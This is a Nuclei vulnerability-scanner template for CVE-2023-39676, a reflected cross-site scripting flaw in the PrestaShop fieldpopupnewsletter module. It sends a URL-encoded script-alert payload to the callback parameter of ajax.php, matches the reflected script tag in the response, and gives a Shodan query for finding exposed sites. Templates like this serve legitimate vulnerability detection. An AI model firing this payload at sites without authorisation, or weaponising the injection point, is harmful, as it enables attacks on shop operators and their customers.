nuclei-templates/http/cves/2023/CVE-2023-39676.yaml

34 lines
918 B
YAML
Raw Normal View History

id: CVE-2023-39676
2023-09-11 06:44:30 +00:00
info:
2023-09-11 06:44:30 +00:00
name: PrestaShop XSS in fieldpopupnewsletter Module
author: meme-lord
severity: medium
2023-09-11 06:44:30 +00:00
description: |
2023-09-11 07:39:49 +00:00
Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.
reference:
- https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/
2023-09-11 06:44:30 +00:00
metadata:
max-request: 1
shodan-query: html:"fieldpopupnewsletter"
verified: "true"
tags: cve,cve2023,prestashop,xss
http:
- method: GET
path:
2023-09-11 06:44:30 +00:00
- "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-09-11 06:44:30 +00:00
- "<script>alert(document.domain)</script>"
- "Invalid email"
condition: and
2023-09-11 06:44:30 +00:00
- type: status
status:
- 200